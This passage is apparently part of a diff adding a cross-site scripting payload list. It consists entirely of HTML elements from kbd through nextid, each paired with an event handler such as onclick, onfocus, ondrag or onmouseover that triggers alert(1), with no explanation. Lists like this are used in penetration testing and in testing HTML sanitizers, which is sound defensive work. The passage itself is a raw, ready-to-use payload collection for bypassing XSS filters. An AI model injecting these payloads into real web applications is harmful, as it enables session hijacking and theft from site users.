onfocusin=alert(1)></kbd> +<kbd onbeforecopy="alert(1)" contenteditable>test</kbd> +<kbd onbeforecut="alert(1)" contenteditable>test</kbd> +<kbd onbeforepaste="alert(1)" contenteditable>test</kbd> +<kbd onblur=alert(1) 
tabindex=1 id=x></kbd><input autofocus> +<kbd onclick="alert(1)">test</kbd> +<kbd oncontextmenu="alert(1)">test</kbd> +<kbd oncopy="alert(1)" contenteditable>test</kbd> +<kbd oncut="alert(1)" contenteditable>test</kbd> +<kbd ondblclick="alert(1)">test</kbd> +<kbd onfocusout=alert(1) tabindex=1 id=x></kbd><input autofocus> +<kbd onkeydown="alert(1)" contenteditable>test</kbd> +<kbd onkeypress="alert(1)" contenteditable>test</kbd> +<kbd onkeyup="alert(1)" contenteditable>test</kbd> +<kbd onmousedown="alert(1)">test</kbd> +<kbd onmouseenter="alert(1)">test</kbd> +<kbd onmouseleave="alert(1)">test</kbd> +<kbd onmousemove="alert(1)">test</kbd> +<kbd onmouseout="alert(1)">test</kbd> +<kbd onmouseover="alert(1)">test</kbd> +<kbd onmouseup="alert(1)">test</kbd> +<kbd onpaste="alert(1)" contenteditable>test</kbd> +<keygen autofocus onfocus=alert(1)> +<keygen autofocus onfocusin=alert(1)> +<keygen draggable="true" ondrag="alert(1)">test</keygen> +<keygen draggable="true" ondragend="alert(1)">test</keygen> +<keygen draggable="true" ondragenter="alert(1)">test</keygen> +<keygen draggable="true" ondragleave="alert(1)">test</keygen> +<keygen draggable="true" ondragstart="alert(1)">test</keygen> +<keygen id=x onfocus=alert(1)> +<keygen id=x onfocusin=alert(1)> +<keygen id=x tabindex=1 onactivate=alert(1)></keygen> +<keygen id=x tabindex=1 onbeforeactivate=alert(1)></keygen> +<keygen id=x tabindex=1 onbeforedeactivate=alert(1)></keygen><input autofocus> +<keygen id=x tabindex=1 ondeactivate=alert(1)></keygen><input id=y autofocus> +<keygen onbeforecopy="alert(1)" contenteditable>test</keygen> +<keygen onbeforecut="alert(1)" contenteditable>test</keygen> +<keygen onbeforepaste="alert(1)" contenteditable>test</keygen> +<keygen onblur=alert(1) tabindex=1 id=x></keygen><input autofocus> +<keygen onclick="alert(1)">test</keygen> +<keygen oncontextmenu="alert(1)">test</keygen> +<keygen oncopy="alert(1)" contenteditable>test</keygen> +<keygen oncut="alert(1)" 
contenteditable>test</keygen> +<keygen ondblclick="alert(1)">test</keygen> +<keygen onfocusout=alert(1) tabindex=1 id=x></keygen><input autofocus> +<keygen onkeydown="alert(1)" contenteditable>test</keygen> +<keygen onkeypress="alert(1)" contenteditable>test</keygen> +<keygen onkeyup="alert(1)" contenteditable>test</keygen> +<keygen onmousedown="alert(1)">test</keygen> +<keygen onmouseenter="alert(1)">test</keygen> +<keygen onmouseleave="alert(1)">test</keygen> +<keygen onmousemove="alert(1)">test</keygen> +<keygen onmouseout="alert(1)">test</keygen> +<keygen onmouseover="alert(1)">test</keygen> +<keygen onmouseup="alert(1)">test</keygen> +<keygen onpaste="alert(1)" contenteditable>test</keygen> +<label draggable="true" ondrag="alert(1)">test</label> +<label draggable="true" ondragend="alert(1)">test</label> +<label draggable="true" ondragenter="alert(1)">test</label> +<label draggable="true" ondragleave="alert(1)">test</label> +<label draggable="true" ondragstart="alert(1)">test</label> +<label id=x tabindex=1 onactivate=alert(1)></label> +<label id=x tabindex=1 onbeforeactivate=alert(1)></label> +<label id=x tabindex=1 onbeforedeactivate=alert(1)></label><input autofocus> +<label id=x tabindex=1 ondeactivate=alert(1)></label><input id=y autofocus> +<label id=x tabindex=1 onfocus=alert(1)></label> +<label id=x tabindex=1 onfocusin=alert(1)></label> +<label onbeforecopy="alert(1)" contenteditable>test</label> +<label onbeforecut="alert(1)" contenteditable>test</label> +<label onbeforepaste="alert(1)" contenteditable>test</label> +<label onblur=alert(1) tabindex=1 id=x></label><input autofocus> +<label onclick="alert(1)">test</label> +<label oncontextmenu="alert(1)">test</label> +<label oncopy="alert(1)" contenteditable>test</label> +<label oncut="alert(1)" contenteditable>test</label> +<label ondblclick="alert(1)">test</label> +<label onfocusout=alert(1) tabindex=1 id=x></label><input autofocus> +<label onkeydown="alert(1)" contenteditable>test</label> +<label 
onkeypress="alert(1)" contenteditable>test</label> +<label onkeyup="alert(1)" contenteditable>test</label> +<label onmousedown="alert(1)">test</label> +<label onmouseenter="alert(1)">test</label> +<label onmouseleave="alert(1)">test</label> +<label onmousemove="alert(1)">test</label> +<label onmouseout="alert(1)">test</label> +<label onmouseover="alert(1)">test</label> +<label onmouseup="alert(1)">test</label> +<label onpaste="alert(1)" contenteditable>test</label> +<legend draggable="true" ondrag="alert(1)">test</legend> +<legend draggable="true" ondragend="alert(1)">test</legend> +<legend draggable="true" ondragenter="alert(1)">test</legend> +<legend draggable="true" ondragleave="alert(1)">test</legend> +<legend draggable="true" ondragstart="alert(1)">test</legend> +<legend id=x tabindex=1 onactivate=alert(1)></legend> +<legend id=x tabindex=1 onbeforeactivate=alert(1)></legend> +<legend id=x tabindex=1 onbeforedeactivate=alert(1)></legend><input autofocus> +<legend id=x tabindex=1 ondeactivate=alert(1)></legend><input id=y autofocus> +<legend id=x tabindex=1 onfocus=alert(1)></legend> +<legend id=x tabindex=1 onfocusin=alert(1)></legend> +<legend onbeforecopy="alert(1)" contenteditable>test</legend> +<legend onbeforecut="alert(1)" contenteditable>test</legend> +<legend onbeforepaste="alert(1)" contenteditable>test</legend> +<legend onblur=alert(1) tabindex=1 id=x></legend><input autofocus> +<legend onclick="alert(1)">test</legend> +<legend oncontextmenu="alert(1)">test</legend> +<legend oncopy="alert(1)" contenteditable>test</legend> +<legend oncut="alert(1)" contenteditable>test</legend> +<legend ondblclick="alert(1)">test</legend> +<legend onfocusout=alert(1) tabindex=1 id=x></legend><input autofocus> +<legend onkeydown="alert(1)" contenteditable>test</legend> +<legend onkeypress="alert(1)" contenteditable>test</legend> +<legend onkeyup="alert(1)" contenteditable>test</legend> +<legend onmousedown="alert(1)">test</legend> +<legend 
onmouseenter="alert(1)">test</legend> +<legend onmouseleave="alert(1)">test</legend> +<legend onmousemove="alert(1)">test</legend> +<legend onmouseout="alert(1)">test</legend> +<legend onmouseover="alert(1)">test</legend> +<legend onmouseup="alert(1)">test</legend> +<legend onpaste="alert(1)" contenteditable>test</legend> +<li draggable="true" ondrag="alert(1)">test</li> +<li draggable="true" ondragend="alert(1)">test</li> +<li draggable="true" ondragenter="alert(1)">test</li> +<li draggable="true" ondragleave="alert(1)">test</li> +<li draggable="true" ondragstart="alert(1)">test</li> +<li id=x tabindex=1 onactivate=alert(1)></li> +<li id=x tabindex=1 onbeforeactivate=alert(1)></li> +<li id=x tabindex=1 onbeforedeactivate=alert(1)></li><input autofocus> +<li id=x tabindex=1 ondeactivate=alert(1)></li><input id=y autofocus> +<li id=x tabindex=1 onfocus=alert(1)></li> +<li id=x tabindex=1 onfocusin=alert(1)></li> +<li onbeforecopy="alert(1)" contenteditable>test</li> +<li onbeforecut="alert(1)" contenteditable>test</li> +<li onbeforepaste="alert(1)" contenteditable>test</li> +<li onblur=alert(1) tabindex=1 id=x></li><input autofocus> +<li onclick="alert(1)">test</li> +<li oncontextmenu="alert(1)">test</li> +<li oncopy="alert(1)" contenteditable>test</li> +<li oncut="alert(1)" contenteditable>test</li> +<li ondblclick="alert(1)">test</li> +<li onfocusout=alert(1) tabindex=1 id=x></li><input autofocus> +<li onkeydown="alert(1)" contenteditable>test</li> +<li onkeypress="alert(1)" contenteditable>test</li> +<li onkeyup="alert(1)" contenteditable>test</li> +<li onmousedown="alert(1)">test</li> +<li onmouseenter="alert(1)">test</li> +<li onmouseleave="alert(1)">test</li> +<li onmousemove="alert(1)">test</li> +<li onmouseout="alert(1)">test</li> +<li onmouseover="alert(1)">test</li> +<li onmouseup="alert(1)">test</li> +<li onpaste="alert(1)" contenteditable>test</li> +<link draggable="true" ondrag="alert(1)">test</link> +<link draggable="true" 
ondragend="alert(1)">test</link> +<link draggable="true" ondragenter="alert(1)">test</link> +<link draggable="true" ondragleave="alert(1)">test</link> +<link draggable="true" ondragstart="alert(1)">test</link> +<link href=validstyles.css rel=stylesheet onload=alert(1)> +<link id=x tabindex=1 onactivate=alert(1)></link> +<link id=x tabindex=1 onbeforeactivate=alert(1)></link> +<link id=x tabindex=1 onbeforedeactivate=alert(1)></link><input autofocus> +<link id=x tabindex=1 ondeactivate=alert(1)></link><input id=y autofocus> +<link onbeforecopy="alert(1)" contenteditable>test</link> +<link onbeforecut="alert(1)" contenteditable>test</link> +<link onbeforepaste="alert(1)" contenteditable>test</link> +<link onblur=alert(1) tabindex=1 id=x></link><input autofocus> +<link onclick="alert(1)">test</link> +<link oncontextmenu="alert(1)">test</link> +<link oncopy="alert(1)" contenteditable>test</link> +<link oncut="alert(1)" contenteditable>test</link> +<link ondblclick="alert(1)">test</link> +<link onfocus=alert(1) id=x tabindex=1 style=display:block> +<link onfocusin=alert(1) id=x tabindex=1 style=display:block> +<link onfocusout=alert(1) tabindex=1 id=x></link><input autofocus> +<link onkeydown="alert(1)" contenteditable>test</link> +<link onkeypress="alert(1)" contenteditable>test</link> +<link onkeyup="alert(1)" contenteditable>test</link> +<link onmousedown="alert(1)">test</link> +<link onmouseenter="alert(1)">test</link> +<link onmouseleave="alert(1)">test</link> +<link onmousemove="alert(1)">test</link> +<link onmouseout="alert(1)">test</link> +<link onmouseover="alert(1)">test</link> +<link onmouseup="alert(1)">test</link> +<link onpaste="alert(1)" contenteditable>test</link> +<link onreadystatechange=alert(1) rel=stylesheet href=1> +<link rel=stylesheet href=1 onerror=alert(1)> +<listing draggable="true" ondrag="alert(1)">test</listing> +<listing draggable="true" ondragend="alert(1)">test</listing> +<listing draggable="true" ondragenter="alert(1)">test</listing> 
+<listing draggable="true" ondragleave="alert(1)">test</listing> +<listing draggable="true" ondragstart="alert(1)">test</listing> +<listing id=x tabindex=1 onactivate=alert(1)></listing> +<listing id=x tabindex=1 onbeforeactivate=alert(1)></listing> +<listing id=x tabindex=1 onbeforedeactivate=alert(1)></listing><input autofocus> +<listing id=x tabindex=1 ondeactivate=alert(1)></listing><input id=y autofocus> +<listing id=x tabindex=1 onfocus=alert(1)></listing> +<listing id=x tabindex=1 onfocusin=alert(1)></listing> +<listing onbeforecopy="alert(1)" contenteditable>test</listing> +<listing onbeforecut="alert(1)" contenteditable>test</listing> +<listing onbeforepaste="alert(1)" contenteditable>test</listing> +<listing onblur=alert(1) tabindex=1 id=x></listing><input autofocus> +<listing onclick="alert(1)">test</listing> +<listing oncontextmenu="alert(1)">test</listing> +<listing oncopy="alert(1)" contenteditable>test</listing> +<listing oncut="alert(1)" contenteditable>test</listing> +<listing ondblclick="alert(1)">test</listing> +<listing onfocusout=alert(1) tabindex=1 id=x></listing><input autofocus> +<listing onkeydown="alert(1)" contenteditable>test</listing> +<listing onkeypress="alert(1)" contenteditable>test</listing> +<listing onkeyup="alert(1)" contenteditable>test</listing> +<listing onmousedown="alert(1)">test</listing> +<listing onmouseenter="alert(1)">test</listing> +<listing onmouseleave="alert(1)">test</listing> +<listing onmousemove="alert(1)">test</listing> +<listing onmouseout="alert(1)">test</listing> +<listing onmouseover="alert(1)">test</listing> +<listing onmouseup="alert(1)">test</listing> +<listing onpaste="alert(1)" contenteditable>test</listing> +<main draggable="true" ondrag="alert(1)">test</main> +<main draggable="true" ondragend="alert(1)">test</main> +<main draggable="true" ondragenter="alert(1)">test</main> +<main draggable="true" ondragleave="alert(1)">test</main> +<main draggable="true" ondragstart="alert(1)">test</main> +<main id=x 
tabindex=1 onactivate=alert(1)></main> +<main id=x tabindex=1 onbeforeactivate=alert(1)></main> +<main id=x tabindex=1 onbeforedeactivate=alert(1)></main><input autofocus> +<main id=x tabindex=1 ondeactivate=alert(1)></main><input id=y autofocus> +<main id=x tabindex=1 onfocus=alert(1)></main> +<main id=x tabindex=1 onfocusin=alert(1)></main> +<main onbeforecopy="alert(1)" contenteditable>test</main> +<main onbeforecut="alert(1)" contenteditable>test</main> +<main onbeforepaste="alert(1)" contenteditable>test</main> +<main onblur=alert(1) tabindex=1 id=x></main><input autofocus> +<main onclick="alert(1)">test</main> +<main oncontextmenu="alert(1)">test</main> +<main oncopy="alert(1)" contenteditable>test</main> +<main oncut="alert(1)" contenteditable>test</main> +<main ondblclick="alert(1)">test</main> +<main onfocusout=alert(1) tabindex=1 id=x></main><input autofocus> +<main onkeydown="alert(1)" contenteditable>test</main> +<main onkeypress="alert(1)" contenteditable>test</main> +<main onkeyup="alert(1)" contenteditable>test</main> +<main onmousedown="alert(1)">test</main> +<main onmouseenter="alert(1)">test</main> +<main onmouseleave="alert(1)">test</main> +<main onmousemove="alert(1)">test</main> +<main onmouseout="alert(1)">test</main> +<main onmouseover="alert(1)">test</main> +<main onmouseup="alert(1)">test</main> +<main onpaste="alert(1)" contenteditable>test</main> +<map draggable="true" ondrag="alert(1)">test</map> +<map draggable="true" ondragend="alert(1)">test</map> +<map draggable="true" ondragenter="alert(1)">test</map> +<map draggable="true" ondragleave="alert(1)">test</map> +<map draggable="true" ondragstart="alert(1)">test</map> +<map id=x tabindex=1 onactivate=alert(1)></map> +<map id=x tabindex=1 onbeforeactivate=alert(1)></map> +<map id=x tabindex=1 onbeforedeactivate=alert(1)></map><input autofocus> +<map id=x tabindex=1 ondeactivate=alert(1)></map><input id=y autofocus> +<map id=x tabindex=1 onfocus=alert(1)></map> +<map id=x tabindex=1 
onfocusin=alert(1)></map> +<map onbeforecopy="alert(1)" contenteditable>test</map> +<map onbeforecut="alert(1)" contenteditable>test</map> +<map onbeforepaste="alert(1)" contenteditable>test</map> +<map onblur=alert(1) tabindex=1 id=x></map><input autofocus> +<map onclick="alert(1)">test</map> +<map oncontextmenu="alert(1)">test</map> +<map oncopy="alert(1)" contenteditable>test</map> +<map oncut="alert(1)" contenteditable>test</map> +<map ondblclick="alert(1)">test</map> +<map onfocusout=alert(1) tabindex=1 id=x></map><input autofocus> +<map onkeydown="alert(1)" contenteditable>test</map> +<map onkeypress="alert(1)" contenteditable>test</map> +<map onkeyup="alert(1)" contenteditable>test</map> +<map onmousedown="alert(1)">test</map> +<map onmouseenter="alert(1)">test</map> +<map onmouseleave="alert(1)">test</map> +<map onmousemove="alert(1)">test</map> +<map onmouseout="alert(1)">test</map> +<map onmouseover="alert(1)">test</map> +<map onmouseup="alert(1)">test</map> +<map onpaste="alert(1)" contenteditable>test</map> +<mark draggable="true" ondrag="alert(1)">test</mark> +<mark draggable="true" ondragend="alert(1)">test</mark> +<mark draggable="true" ondragenter="alert(1)">test</mark> +<mark draggable="true" ondragleave="alert(1)">test</mark> +<mark draggable="true" ondragstart="alert(1)">test</mark> +<mark id=x tabindex=1 onactivate=alert(1)></mark> +<mark id=x tabindex=1 onbeforeactivate=alert(1)></mark> +<mark id=x tabindex=1 onbeforedeactivate=alert(1)></mark><input autofocus> +<mark id=x tabindex=1 ondeactivate=alert(1)></mark><input id=y autofocus> +<mark id=x tabindex=1 onfocus=alert(1)></mark> +<mark id=x tabindex=1 onfocusin=alert(1)></mark> +<mark onbeforecopy="alert(1)" contenteditable>test</mark> +<mark onbeforecut="alert(1)" contenteditable>test</mark> +<mark onbeforepaste="alert(1)" contenteditable>test</mark> +<mark onblur=alert(1) tabindex=1 id=x></mark><input autofocus> +<mark onclick="alert(1)">test</mark> +<mark 
oncontextmenu="alert(1)">test</mark> +<mark oncopy="alert(1)" contenteditable>test</mark> +<mark oncut="alert(1)" contenteditable>test</mark> +<mark ondblclick="alert(1)">test</mark> +<mark onfocusout=alert(1) tabindex=1 id=x></mark><input autofocus> +<mark onkeydown="alert(1)" contenteditable>test</mark> +<mark onkeypress="alert(1)" contenteditable>test</mark> +<mark onkeyup="alert(1)" contenteditable>test</mark> +<mark onmousedown="alert(1)">test</mark> +<mark onmouseenter="alert(1)">test</mark> +<mark onmouseleave="alert(1)">test</mark> +<mark onmousemove="alert(1)">test</mark> +<mark onmouseout="alert(1)">test</mark> +<mark onmouseover="alert(1)">test</mark> +<mark onmouseup="alert(1)">test</mark> +<mark onpaste="alert(1)" contenteditable>test</mark> +<marquee draggable="true" ondrag="alert(1)">test</marquee> +<marquee draggable="true" ondragend="alert(1)">test</marquee> +<marquee draggable="true" ondragenter="alert(1)">test</marquee> +<marquee draggable="true" ondragleave="alert(1)">test</marquee> +<marquee draggable="true" ondragstart="alert(1)">test</marquee> +<marquee id=x tabindex=1 onactivate=alert(1)></marquee> +<marquee id=x tabindex=1 onbeforeactivate=alert(1)></marquee> +<marquee id=x tabindex=1 onbeforedeactivate=alert(1)></marquee><input autofocus> +<marquee id=x tabindex=1 ondeactivate=alert(1)></marquee><input id=y autofocus> +<marquee id=x tabindex=1 onfocus=alert(1)></marquee> +<marquee id=x tabindex=1 onfocusin=alert(1)></marquee> +<marquee onbeforecopy="alert(1)" contenteditable>test</marquee> +<marquee onbeforecut="alert(1)" contenteditable>test</marquee> +<marquee onbeforepaste="alert(1)" contenteditable>test</marquee> +<marquee onblur=alert(1) tabindex=1 id=x></marquee><input autofocus> +<marquee onclick="alert(1)">test</marquee> +<marquee oncontextmenu="alert(1)">test</marquee> +<marquee oncopy="alert(1)" contenteditable>test</marquee> +<marquee oncut="alert(1)" contenteditable>test</marquee> +<marquee ondblclick="alert(1)">test</marquee> 
+<marquee onfocusout=alert(1) tabindex=1 id=x></marquee><input autofocus> +<marquee onkeydown="alert(1)" contenteditable>test</marquee> +<marquee onkeypress="alert(1)" contenteditable>test</marquee> +<marquee onkeyup="alert(1)" contenteditable>test</marquee> +<marquee onmousedown="alert(1)">test</marquee> +<marquee onmouseenter="alert(1)">test</marquee> +<marquee onmouseleave="alert(1)">test</marquee> +<marquee onmousemove="alert(1)">test</marquee> +<marquee onmouseout="alert(1)">test</marquee> +<marquee onmouseover="alert(1)">test</marquee> +<marquee onmouseup="alert(1)">test</marquee> +<marquee onpaste="alert(1)" contenteditable>test</marquee> +<marquee onstart=alert(1)>XSS</marquee> +<marquee width=1 loop=1 onbounce=alert(1)>XSS</marquee> +<marquee width=1 loop=1 onfinish=alert(1)>XSS</marquee> +<menu draggable="true" ondrag="alert(1)">test</menu> +<menu draggable="true" ondragend="alert(1)">test</menu> +<menu draggable="true" ondragenter="alert(1)">test</menu> +<menu draggable="true" ondragleave="alert(1)">test</menu> +<menu draggable="true" ondragstart="alert(1)">test</menu> +<menu id=x tabindex=1 onactivate=alert(1)></menu> +<menu id=x tabindex=1 onbeforeactivate=alert(1)></menu> +<menu id=x tabindex=1 onbeforedeactivate=alert(1)></menu><input autofocus> +<menu id=x tabindex=1 ondeactivate=alert(1)></menu><input id=y autofocus> +<menu id=x tabindex=1 onfocus=alert(1)></menu> +<menu id=x tabindex=1 onfocusin=alert(1)></menu> +<menu onbeforecopy="alert(1)" contenteditable>test</menu> +<menu onbeforecut="alert(1)" contenteditable>test</menu> +<menu onbeforepaste="alert(1)" contenteditable>test</menu> +<menu onblur=alert(1) tabindex=1 id=x></menu><input autofocus> +<menu onclick="alert(1)">test</menu> +<menu oncontextmenu="alert(1)">test</menu> +<menu oncopy="alert(1)" contenteditable>test</menu> +<menu oncut="alert(1)" contenteditable>test</menu> +<menu ondblclick="alert(1)">test</menu> +<menu onfocusout=alert(1) tabindex=1 id=x></menu><input autofocus> +<menu 
onkeydown="alert(1)" contenteditable>test</menu> +<menu onkeypress="alert(1)" contenteditable>test</menu> +<menu onkeyup="alert(1)" contenteditable>test</menu> +<menu onmousedown="alert(1)">test</menu> +<menu onmouseenter="alert(1)">test</menu> +<menu onmouseleave="alert(1)">test</menu> +<menu onmousemove="alert(1)">test</menu> +<menu onmouseout="alert(1)">test</menu> +<menu onmouseover="alert(1)">test</menu> +<menu onmouseup="alert(1)">test</menu> +<menu onpaste="alert(1)" contenteditable>test</menu> +<menuitem draggable="true" ondrag="alert(1)">test</menuitem> +<menuitem draggable="true" ondragend="alert(1)">test</menuitem> +<menuitem draggable="true" ondragenter="alert(1)">test</menuitem> +<menuitem draggable="true" ondragleave="alert(1)">test</menuitem> +<menuitem draggable="true" ondragstart="alert(1)">test</menuitem> +<menuitem id=x tabindex=1 onactivate=alert(1)></menuitem> +<menuitem id=x tabindex=1 onbeforeactivate=alert(1)></menuitem> +<menuitem id=x tabindex=1 onbeforedeactivate=alert(1)></menuitem><input autofocus> +<menuitem id=x tabindex=1 ondeactivate=alert(1)></menuitem><input id=y autofocus> +<menuitem id=x tabindex=1 onfocus=alert(1)></menuitem> +<menuitem id=x tabindex=1 onfocusin=alert(1)></menuitem> +<menuitem onbeforecopy="alert(1)" contenteditable>test</menuitem> +<menuitem onbeforecut="alert(1)" contenteditable>test</menuitem> +<menuitem onbeforepaste="alert(1)" contenteditable>test</menuitem> +<menuitem onblur=alert(1) tabindex=1 id=x></menuitem><input autofocus> +<menuitem onclick="alert(1)">test</menuitem> +<menuitem oncontextmenu="alert(1)">test</menuitem> +<menuitem oncopy="alert(1)" contenteditable>test</menuitem> +<menuitem oncut="alert(1)" contenteditable>test</menuitem> +<menuitem ondblclick="alert(1)">test</menuitem> +<menuitem onfocusout=alert(1) tabindex=1 id=x></menuitem><input autofocus> +<menuitem onkeydown="alert(1)" contenteditable>test</menuitem> +<menuitem onkeypress="alert(1)" contenteditable>test</menuitem> +<menuitem 
onkeyup="alert(1)" contenteditable>test</menuitem> +<menuitem onmousedown="alert(1)">test</menuitem> +<menuitem onmouseenter="alert(1)">test</menuitem> +<menuitem onmouseleave="alert(1)">test</menuitem> +<menuitem onmousemove="alert(1)">test</menuitem> +<menuitem onmouseout="alert(1)">test</menuitem> +<menuitem onmouseover="alert(1)">test</menuitem> +<menuitem onmouseup="alert(1)">test</menuitem> +<menuitem onpaste="alert(1)" contenteditable>test</menuitem> +<meta draggable="true" ondrag="alert(1)">test</meta> +<meta draggable="true" ondragend="alert(1)">test</meta> +<meta draggable="true" ondragenter="alert(1)">test</meta> +<meta draggable="true" ondragleave="alert(1)">test</meta> +<meta draggable="true" ondragstart="alert(1)">test</meta> +<meta id=x tabindex=1 onactivate=alert(1)></meta> +<meta id=x tabindex=1 onbeforeactivate=alert(1)></meta> +<meta id=x tabindex=1 onbeforedeactivate=alert(1)></meta><input autofocus> +<meta id=x tabindex=1 ondeactivate=alert(1)></meta><input id=y autofocus> +<meta id=x tabindex=1 onfocus=alert(1)></meta> +<meta id=x tabindex=1 onfocusin=alert(1)></meta> +<meta onbeforecopy="alert(1)" contenteditable>test</meta> +<meta onbeforecut="alert(1)" contenteditable>test</meta> +<meta onbeforepaste="alert(1)" contenteditable>test</meta> +<meta onblur=alert(1) tabindex=1 id=x></meta><input autofocus> +<meta onclick="alert(1)">test</meta> +<meta oncontextmenu="alert(1)">test</meta> +<meta oncopy="alert(1)" contenteditable>test</meta> +<meta oncut="alert(1)" contenteditable>test</meta> +<meta ondblclick="alert(1)">test</meta> +<meta onfocusout=alert(1) tabindex=1 id=x></meta><input autofocus> +<meta onkeydown="alert(1)" contenteditable>test</meta> +<meta onkeypress="alert(1)" contenteditable>test</meta> +<meta onkeyup="alert(1)" contenteditable>test</meta> +<meta onmousedown="alert(1)">test</meta> +<meta onmouseenter="alert(1)">test</meta> +<meta onmouseleave="alert(1)">test</meta> +<meta onmousemove="alert(1)">test</meta> +<meta 
onmouseout="alert(1)">test</meta> +<meta onmouseover="alert(1)">test</meta> +<meta onmouseup="alert(1)">test</meta> +<meta onpaste="alert(1)" contenteditable>test</meta> +<meter draggable="true" ondrag="alert(1)">test</meter> +<meter draggable="true" ondragend="alert(1)">test</meter> +<meter draggable="true" ondragenter="alert(1)">test</meter> +<meter draggable="true" ondragleave="alert(1)">test</meter> +<meter draggable="true" ondragstart="alert(1)">test</meter> +<meter id=x tabindex=1 onactivate=alert(1)></meter> +<meter id=x tabindex=1 onbeforeactivate=alert(1)></meter> +<meter id=x tabindex=1 onbeforedeactivate=alert(1)></meter><input autofocus> +<meter id=x tabindex=1 ondeactivate=alert(1)></meter><input id=y autofocus> +<meter id=x tabindex=1 onfocus=alert(1)></meter> +<meter id=x tabindex=1 onfocusin=alert(1)></meter> +<meter onbeforecopy="alert(1)" contenteditable>test</meter> +<meter onbeforecut="alert(1)" contenteditable>test</meter> +<meter onbeforepaste="alert(1)" contenteditable>test</meter> +<meter onblur=alert(1) tabindex=1 id=x></meter><input autofocus> +<meter onclick="alert(1)">test</meter> +<meter oncontextmenu="alert(1)">test</meter> +<meter oncopy="alert(1)" contenteditable>test</meter> +<meter oncut="alert(1)" contenteditable>test</meter> +<meter ondblclick="alert(1)">test</meter> +<meter onfocusout=alert(1) tabindex=1 id=x></meter><input autofocus> +<meter onkeydown="alert(1)" contenteditable>test</meter> +<meter onkeypress="alert(1)" contenteditable>test</meter> +<meter onkeyup="alert(1)" contenteditable>test</meter> +<meter onmousedown="alert(1)">test</meter> +<meter onmouseenter="alert(1)">test</meter> +<meter onmouseleave="alert(1)">test</meter> +<meter onmousemove="alert(1)">test</meter> +<meter onmouseout="alert(1)">test</meter> +<meter onmouseover="alert(1)">test</meter> +<meter onmouseup="alert(1)">test</meter> +<meter onpaste="alert(1)" contenteditable>test</meter> +<multicol draggable="true" ondrag="alert(1)">test</multicol> 
+<multicol draggable="true" ondragend="alert(1)">test</multicol> +<multicol draggable="true" ondragenter="alert(1)">test</multicol> +<multicol draggable="true" ondragleave="alert(1)">test</multicol> +<multicol draggable="true" ondragstart="alert(1)">test</multicol> +<multicol id=x tabindex=1 onactivate=alert(1)></multicol> +<multicol id=x tabindex=1 onbeforeactivate=alert(1)></multicol> +<multicol id=x tabindex=1 onbeforedeactivate=alert(1)></multicol><input autofocus> +<multicol id=x tabindex=1 ondeactivate=alert(1)></multicol><input id=y autofocus> +<multicol id=x tabindex=1 onfocus=alert(1)></multicol> +<multicol id=x tabindex=1 onfocusin=alert(1)></multicol> +<multicol onbeforecopy="alert(1)" contenteditable>test</multicol> +<multicol onbeforecut="alert(1)" contenteditable>test</multicol> +<multicol onbeforepaste="alert(1)" contenteditable>test</multicol> +<multicol onblur=alert(1) tabindex=1 id=x></multicol><input autofocus> +<multicol onclick="alert(1)">test</multicol> +<multicol oncontextmenu="alert(1)">test</multicol> +<multicol oncopy="alert(1)" contenteditable>test</multicol> +<multicol oncut="alert(1)" contenteditable>test</multicol> +<multicol ondblclick="alert(1)">test</multicol> +<multicol onfocusout=alert(1) tabindex=1 id=x></multicol><input autofocus> +<multicol onkeydown="alert(1)" contenteditable>test</multicol> +<multicol onkeypress="alert(1)" contenteditable>test</multicol> +<multicol onkeyup="alert(1)" contenteditable>test</multicol> +<multicol onmousedown="alert(1)">test</multicol> +<multicol onmouseenter="alert(1)">test</multicol> +<multicol onmouseleave="alert(1)">test</multicol> +<multicol onmousemove="alert(1)">test</multicol> +<multicol onmouseout="alert(1)">test</multicol> +<multicol onmouseover="alert(1)">test</multicol> +<multicol onmouseup="alert(1)">test</multicol> +<multicol onpaste="alert(1)" contenteditable>test</multicol> +<nav draggable="true" ondrag="alert(1)">test</nav> +<nav draggable="true" ondragend="alert(1)">test</nav> 
+<nav draggable="true" ondragenter="alert(1)">test</nav> +<nav draggable="true" ondragleave="alert(1)">test</nav> +<nav draggable="true" ondragstart="alert(1)">test</nav> +<nav id=x tabindex=1 onactivate=alert(1)></nav> +<nav id=x tabindex=1 onbeforeactivate=alert(1)></nav> +<nav id=x tabindex=1 onbeforedeactivate=alert(1)></nav><input autofocus> +<nav id=x tabindex=1 ondeactivate=alert(1)></nav><input id=y autofocus> +<nav id=x tabindex=1 onfocus=alert(1)></nav> +<nav id=x tabindex=1 onfocusin=alert(1)></nav> +<nav onbeforecopy="alert(1)" contenteditable>test</nav> +<nav onbeforecut="alert(1)" contenteditable>test</nav> +<nav onbeforepaste="alert(1)" contenteditable>test</nav> +<nav onblur=alert(1) tabindex=1 id=x></nav><input autofocus> +<nav onclick="alert(1)">test</nav> +<nav oncontextmenu="alert(1)">test</nav> +<nav oncopy="alert(1)" contenteditable>test</nav> +<nav oncut="alert(1)" contenteditable>test</nav> +<nav ondblclick="alert(1)">test</nav> +<nav onfocusout=alert(1) tabindex=1 id=x></nav><input autofocus> +<nav onkeydown="alert(1)" contenteditable>test</nav> +<nav onkeypress="alert(1)" contenteditable>test</nav> +<nav onkeyup="alert(1)" contenteditable>test</nav> +<nav onmousedown="alert(1)">test</nav> +<nav onmouseenter="alert(1)">test</nav> +<nav onmouseleave="alert(1)">test</nav> +<nav onmousemove="alert(1)">test</nav> +<nav onmouseout="alert(1)">test</nav> +<nav onmouseover="alert(1)">test</nav> +<nav onmouseup="alert(1)">test</nav> +<nav onpaste="alert(1)" contenteditable>test</nav> +<nextid draggable="true" ondrag="alert(1)">test</nextid> +<nextid draggable="true" ondragend="alert(1)">test</nextid> +<nextid draggable="true" ondragenter="alert(1)">test</nextid> +<nextid draggable="true" ondragleave="alert(1)">test</nextid> +<nextid draggable="true" ondragstart="alert(1)">test</nextid> +<nextid id=x tabindex=1 onactivate=alert(1)></nextid> +<nextid id=x tabindex=1 onbeforeactivate=alert(1)></nextid> +<nextid id=x tabindex=1 
